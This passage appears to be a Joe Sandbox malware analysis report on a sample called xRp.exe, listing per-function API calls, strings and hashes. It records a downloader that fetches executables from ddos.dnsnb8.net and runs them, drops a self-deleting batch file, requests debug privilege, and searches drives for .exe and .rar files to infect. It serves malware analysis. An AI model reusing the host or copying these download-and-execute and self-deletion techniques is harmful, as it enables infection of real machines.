memset.MSVCRT ref: 00E32766
memset.MSVCRT ref: 00E32774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00E32787
wsprintfA.USER32 ref: 00E327AB

Part of subcall function 00E3185B: GetSystemTimeAsFileTime.KERNEL32(?,?,75BF8400,00000000,?,?,?,00E327B5), ref: 00E31867
Part of subcall function 00E3185B: srand.MSVCRT ref: 00E31878
Part of subcall function 00E3185B: rand.MSVCRT ref: 00E31880
Part of subcall function 00E3185B: srand.MSVCRT ref: 00E31890
Part of subcall function 00E3185B: rand.MSVCRT ref: 00E31894

wsprintfA.USER32 ref: 00E327C6
CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\6b1c0b84.exe,00000000), ref: 00E327D4
wsprintfA.USER32 ref: 00E327F4

Part of subcall function 00E31973: PathFileExistsA.KERNELBASE(TN,75BF8400,00000000), ref: 00E31992
Part of subcall function 00E31973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,C:\Users\user\AppData\Local\Temp\6b1c0b84.exe), ref: 00E319BA
Part of subcall function 00E31973: Sleep.KERNEL32(00000064), ref: 00E319C6
Part of subcall function 00E31973: wsprintfA.USER32 ref: 00E319EC
Part of subcall function 00E31973: CopyFileA.KERNEL32(?,?,00000000), ref: 00E31A00
Part of subcall function 00E31973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E31A1E
Part of subcall function 00E31973: GetFileSize.KERNEL32(?,00000000), ref: 00E31A2C
Part of subcall function 00E31973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00E31A46
Part of subcall function 00E31973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00E31A65

DeleteFileA.KERNEL32(?,?,00E34E54,00E34E58), ref: 00E3281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00E34E54,00E34E58), ref: 00E32832

Strings

%s%.8x.exe, xrefs: 00E327BB
%s%s, xrefs: 00E327A5
C:\Users\user\AppData\Local\Temp\6b1c0b84.exe, xrefs: 00E327C0, 00E327C5, 00E327CC
C:\Users\user\AppData\Local\Temp\, xrefs: 00E327B6
C:\Windows\system32, xrefs: 00E327E3
\WinRAR\Rar.exe, xrefs: 00E32793
c_31892.nls, xrefs: 00E327DE
%s\%s, xrefs: 00E327EE

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\6b1c0b84.exe$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-116600946
Opcode ID: acbb110669a3a895ae9162ce7230f3d95f63c3228c014f265646d21f9aa9719f
Instruction ID: 53281c6494aac8bce0ce340616239ea3a4bbd24699008ac91a12ba78fcdf6215
Opcode Fuzzy Hash: acbb110669a3a895ae9162ce7230f3d95f63c3228c014f265646d21f9aa9719f
Instruction Fuzzy Hash: 012121B694031C7BDB10A7B59C8DFEB7BACDB04744F0015A5B645F2091E674EF48CA60

Function 00E31973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.KERNELBASE(TN,75BF8400,00000000), ref: 00E31992
CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,C:\Users\user\AppData\Local\Temp\6b1c0b84.exe), ref: 00E319BA
Sleep.KERNEL32(00000064), ref: 00E319C6
wsprintfA.USER32 ref: 00E319EC
CopyFileA.KERNEL32(?,?,00000000), ref: 00E31A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E31A1E
GetFileSize.KERNEL32(?,00000000), ref: 00E31A2C
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00E31A46
ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00E31A65
FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00E31A90
DeleteFileA.KERNEL32(?), ref: 00E31AA7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E31AC1

Strings

C:\Users\user\AppData\Local\Temp\6b1c0b84.exe, xrefs: 00E319A6
C:\Users\user\AppData\Local\Temp\, xrefs: 00E319DB
TN, xrefs: 00E31980
%s%.8X.data, xrefs: 00E319E6

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\6b1c0b84.exe$TN
API String ID: 2523042076-4142151661
Opcode ID: 5f9a1ef7b06d35b3dd642acd68f4e879371e2f43c4660022562d85cd2afaa4a1
Instruction ID: e41548065cdac0fb547ed26a20f87cafea07b5a8b334453e5ae42b86a7aea2b0
Opcode Fuzzy Hash: 5f9a1ef7b06d35b3dd642acd68f4e879371e2f43c4660022562d85cd2afaa4a1
Instruction Fuzzy Hash: 62514B71901219AFCB249FA9CD88AAEBFB8EB0435AF1055ADF515F6190D3709E44CF60

Function 00E328B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00E328D3
wsprintfA.USER32 ref: 00E328F7
memset.MSVCRT ref: 00E32925
wsprintfA.USER32 ref: 00E32940

Part of subcall function 00E329E2: memset.MSVCRT ref: 00E32A02
Part of subcall function 00E329E2: wsprintfA.USER32 ref: 00E32A1A
Part of subcall function 00E329E2: memset.MSVCRT ref: 00E32A44
Part of subcall function 00E329E2: lstrlen.KERNEL32(?), ref: 00E32A54
Part of subcall function 00E329E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00E32A6C
Part of subcall function 00E329E2: strrchr.MSVCRT ref: 00E32A7C
Part of subcall function 00E329E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00E32A9F
Part of subcall function 00E329E2: lstrlen.KERNEL32(Documents and Settings), ref: 00E32AAE
Part of subcall function 00E329E2: memset.MSVCRT ref: 00E32AC6
Part of subcall function 00E329E2: memset.MSVCRT ref: 00E32ADA
Part of subcall function 00E329E2: FindFirstFileA.KERNELBASE(?,?), ref: 00E32AEF
Part of subcall function 00E329E2: memset.MSVCRT ref: 00E32B13

strrchr.MSVCRT ref: 00E32959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00E32974

Strings

%s%s, xrefs: 00E328F1
rar, xrefs: 00E32988
%s\, xrefs: 00E3293A
C:\Users\user\AppData\Local\Temp\, xrefs: 00E329B3
exe, xrefs: 00E3296D

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-3007274656
Opcode ID: 94238ad4527308246789a145f3bd040739900aa9539055d55b21ffa6ea427bf0
Instruction ID: a8ccd82e684e2cb4f59fb864dbdcc85eaf9373b6a823bd152df18e924f4aff12
Opcode Fuzzy Hash: 94238ad4527308246789a145f3bd040739900aa9539055d55b21ffa6ea427bf0
Instruction Fuzzy Hash: E131AF7294030D6BDB21AAB5DC8DFDA7FACAB50314F04145AF6C5B2080E6B49AC4CBA0

Function 00E31099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E3185B: GetSystemTimeAsFileTime.KERNEL32(?,?,75BF8400,00000000,?,?,?,00E327B5), ref: 00E31867
Part of subcall function 00E3185B: srand.MSVCRT ref: 00E31878
Part of subcall function 00E3185B: rand.MSVCRT ref: 00E31880
Part of subcall function 00E3185B: srand.MSVCRT ref: 00E31890
Part of subcall function 00E3185B: rand.MSVCRT ref: 00E31894

WinExec.KERNEL32(?,00000005), ref: 00E310F1
lstrlen.KERNEL32(00E34748), ref: 00E310FA
wsprintfA.USER32 ref: 00E3112A
wsprintfA.USER32 ref: 00E31143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00E3115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00E31169
Sleep.KERNEL32 ref: 00E31179

Strings

%s%.8X.exe, xrefs: 00E31124
ddos.dnsnb8.net, xrefs: 00E310C8, 00E310CF, 00E31140, 00E31168
cj/, xrefs: 00E31135
C:\Users\user\AppData\Local\Temp\, xrefs: 00E31119
http://%s:%d/%s/%s, xrefs: 00E310C2, 00E31141
HG, xrefs: 00E3112C

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-2216925602
Opcode ID: 1d1f9dc678411e9c143c4fab6803f1812ae526a94c2a7f9fc84459acb170d38c
Instruction ID: ff09a8b865a513bd798342e530e9c5172db3a81a36d0423717a4fa954b2849b5
Opcode Fuzzy Hash: 1d1f9dc678411e9c143c4fab6803f1812ae526a94c2a7f9fc84459acb170d38c
Instruction Fuzzy Hash: 60216BB590124CBEDB24DBA1DC4DFAEBFB8AB45315F115099E500B2190D774AA88CFA0

Function 00E31581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E3185B: GetSystemTimeAsFileTime.KERNEL32(?,?,75BF8400,00000000,?,?,?,00E327B5), ref: 00E31867
Part of subcall function 00E3185B: srand.MSVCRT ref: 00E31878
Part of subcall function 00E3185B: rand.MSVCRT ref: 00E31880
Part of subcall function 00E3185B: srand.MSVCRT ref: 00E31890
Part of subcall function 00E3185B: rand.MSVCRT ref: 00E31894

wsprintfA.USER32 ref: 00E315AA
wsprintfA.USER32 ref: 00E315C6
lstrlen.KERNEL32(?), ref: 00E315D2
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00E315EE
WriteFile.KERNELBASE(00000000,?,00000000,00000001,00000000), ref: 00E31609
CloseHandle.KERNEL32(00000000), ref: 00E31612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00E3162D

Strings

open, xrefs: 00E31627
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 00E315C0
%s%.8x.bat, xrefs: 00E315A4
C:\Users\user\AppData\Local\Temp\, xrefs: 00E31599
C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 00E3158A, 00E315B3, 00E315B8, 00E315B9

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\xRp.exe$open
API String ID: 617340118-3117919743
Opcode ID: 1237060e5c191634a61e6c64dea493d7cba2d36bfa26d48bfa962a488ced025b
Instruction ID: 654f38c54147a76619b49858f205394784f0ba7defe2aae3de659b9dc5f5b8e2
Opcode Fuzzy Hash: 1237060e5c191634a61e6c64dea493d7cba2d36bfa26d48bfa962a488ced025b
Instruction Fuzzy Hash: 51111FB6A0222C7ED72097A59C8DEEB7E6CDF59761F000491F549F2051EA649B88CAA0

Function 00E31638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00E3164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00E3165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\xRp.exe,00000104), ref: 00E3166E
CreateThread.KERNELBASE(00000000,00000000,00E31099,00000000,00000000,00000000), ref: 00E316AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00E316BD

Part of subcall function 00E3139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 00E313BC
Part of subcall function 00E3139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00E313DA
Part of subcall function 00E3139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00E31448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 00E316E5

Strings

Documents and Settings, xrefs: 00E31696
C:\Users\user\AppData\Local\Temp\, xrefs: 00E31644
C:\Windows\system32, xrefs: 00E31656
C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 00E31662, 00E31667, 00E316DD

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\xRp.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-717810370
Opcode ID: 6bac907d5de68abac79887e832abcdbb229aa6afbb2f871bd604da8a587563bc
Instruction ID: 5f8a19374d379336f94aadf592e584bcc29aec655bd561ec05a28ffa5db5d7f5
Opcode Fuzzy Hash: 6bac907d5de68abac79887e832abcdbb229aa6afbb2f871bd604da8a587563bc
Instruction Fuzzy Hash: 8E11B9715012187FCB2457B6AD4EEAB3EADEB46365F041059F209B10F0D6758544CFA1

Function 00E31000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG,http://%s:%d/%s/%s,00E310E8,?), ref: 00E31018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400), ref: 00E31029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00E31038
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000), ref: 00E3104B
UnmapViewOfFile.KERNEL32(00000000), ref: 00E31075
CloseHandle.KERNEL32(?), ref: 00E3108B
CloseHandle.KERNEL32(00000000), ref: 00E3108E

Strings

ddos.dnsnb8.net, xrefs: 00E31026
http://%s:%d/%s/%s, xrefs: 00E31000
HG, xrefs: 00E31001

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: HG$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-862939041
Opcode ID: 8b37b649dd8f51333af266eb2a1d146bd26fcd9a31ccdb5d76df76a4ca011430
Instruction ID: 804c275208f5cb0407e82e6456282852a3859dc3b690c00f9b5df7c44edd8741
Opcode Fuzzy Hash: 8b37b649dd8f51333af266eb2a1d146bd26fcd9a31ccdb5d76df76a4ca011430
Instruction Fuzzy Hash: DF015BB120425CBFE6246F719C8CE2BBEACEB447A9F004629B245B20A0D6715E488E60

Function 00E32B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00E32BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00E32BB4
GetDriveTypeA.KERNELBASE(?), ref: 00E32BD3
CreateThread.KERNELBASE(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00E32BEE
lstrlen.KERNEL32(?), ref: 00E32BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00E32C16
CreateThread.KERNELBASE(00000000,00000000,Function_00002845,00000000,00000000,00000000), ref: 00E32C3A

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: de0a88fcb5910d83256a3f2bae9f337f001efff177989c0d8f9441b86ca39410
Instruction ID: 4d678d243cbfc12175ab373ba36545e8049b91c258307c21e6e73c3f15bb605a
Opcode Fuzzy Hash: de0a88fcb5910d83256a3f2bae9f337f001efff177989c0d8f9441b86ca39410
Instruction Fuzzy Hash: AF21C3B180015CAFE7249F65AC8CDAEBFADFF04349F141129FA82B2151D7249D0ACF60

Function 00E32C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00E32C57

Part of subcall function 00E31973: PathFileExistsA.KERNELBASE(TN,75BF8400,00000000), ref: 00E31992
Part of subcall function 00E31973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,C:\Users\user\AppData\Local\Temp\6b1c0b84.exe), ref: 00E319BA
Part of subcall function 00E31973: Sleep.KERNEL32(00000064), ref: 00E319C6
Part of subcall function 00E31973: wsprintfA.USER32 ref: 00E319EC
Part of subcall function 00E31973: CopyFileA.KERNEL32(?,?,00000000), ref: 00E31A00
Part of subcall function 00E31973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E31A1E
Part of subcall function 00E31973: GetFileSize.KERNEL32(?,00000000), ref: 00E31A2C
Part of subcall function 00E31973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00E31A46
Part of subcall function 00E31973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00E31A65

CreateThread.KERNELBASE(00000000,00000000,00E32B8C,00000000,00000000,00000000), ref: 00E32C99
WaitForMultipleObjects.KERNEL32(00000001,00E316BA,00000001,000000FF,?,00E316BA,00000000), ref: 00E32CAC
VirtualFree.KERNELBASE(00840000,00000000,00008000,C:\Users\user\AppData\Local\Temp\xRp.exe,00E34E5C,00E34E60,?,00E316BA,00000000), ref: 00E32CC2

Strings

C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 00E32C69

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\xRp.exe
API String ID: 2042498389-1450390661
Opcode ID: 732323e3cee5bc316de00d15060429b223b5b1b0c10a3f24b7c6742351dfa134
Instruction ID: 0fe868763e628d24e875a3658e047bce49fbc64af0df361670d52d83f084308b
Opcode Fuzzy Hash: 732323e3cee5bc316de00d15060429b223b5b1b0c10a3f24b7c6742351dfa134
Instruction Fuzzy Hash: 320184B16412247FD71497A69C0EEAFBFACEF41B60F105154B605FA1C1D6A0E948C7E0

Function 00E32845 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E3274A: memset.MSVCRT ref: 00E32766
Part of subcall function 00E3274A: memset.MSVCRT ref: 00E32774
Part of subcall function 00E3274A: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00E32787
Part of subcall function 00E3274A: wsprintfA.USER32 ref: 00E327AB
Part of subcall function 00E3274A: wsprintfA.USER32 ref: 00E327C6
Part of subcall function 00E3274A: CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\6b1c0b84.exe,00000000), ref: 00E327D4
Part of subcall function 00E3274A: wsprintfA.USER32 ref: 00E327F4
Part of subcall function 00E3274A: DeleteFileA.KERNEL32(?,?,00E34E54,00E34E58), ref: 00E3281A
Part of subcall function 00E3274A: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00E34E54,00E34E58), ref: 00E32832

DeleteFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\6b1c0b84.exe), ref: 00E3287D
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00E32894
CloseHandle.KERNEL32(FFFFFFFF), ref: 00E328A5

Part of subcall function 00E32692: CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,00E32873,?,00000002), ref: 00E326A7
Part of subcall function 00E32692: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,00E32873,?,00000002), ref: 00E326B5
Part of subcall function 00E32692: lstrlen.KERNEL32(?), ref: 00E326C4
Part of subcall function 00E32692: ??2@YAPAXI@Z.MSVCRT ref: 00E326CE
Part of subcall function 00E32692: lstrcpy.KERNEL32(00000004,?), ref: 00E326E3
Part of subcall function 00E32692: SetEvent.KERNEL32 ref: 00E3273C

Strings

C:\Users\user\AppData\Local\Temp\6b1c0b84.exe, xrefs: 00E32878

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: File$wsprintf$CreateDeleteEventmemset$??2@CloseCopyFolderFreeHandleObjectPathSingleSpecialVirtualWaitlstrcpylstrlen
String ID: C:\Users\user\AppData\Local\Temp\6b1c0b84.exe
API String ID: 2533558932-1001431116
Opcode ID: e4a916d92c56a2f3bd6cb5795736de17c659835c5152fdb39a3219c244a8bc12
Instruction ID: 1f441cefac8e610d85402a01551570703bdac07b54d5c816e15fc81a6c2dab52
Opcode Fuzzy Hash: e4a916d92c56a2f3bd6cb5795736de17c659835c5152fdb39a3219c244a8bc12
Instruction Fuzzy Hash: 12F090B060030C5BD724A776AD4EF593FACAB10305F101554B786F20D0DBB8E448CE11

Function 00E314E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00E31504
VirtualQuery.KERNEL32(00E314E1,?,0000001C), ref: 00E31525
ExitProcess.KERNEL32 ref: 00E3157A

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 3dba1cc841353ad3ff20ed1210e80183aba6406759c39bc6cc72cfa5d66cb8eb
Instruction ID: c9c6cf8e224479dbebd4d8c8fcdce18e75b282011b357aeed1b970b91499408e
Opcode Fuzzy Hash: 3dba1cc841353ad3ff20ed1210e80183aba6406759c39bc6cc72cfa5d66cb8eb
Instruction Fuzzy Hash: B2115AB1900208EFCB20DFA6A88DA79BFA8EBC4755F10606EF402F2190D674A945DB50

Function 00E36159 Relevance: 2.6, APIs: 2, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 00E360DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00E36189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00E361A5

Memory Dump Source

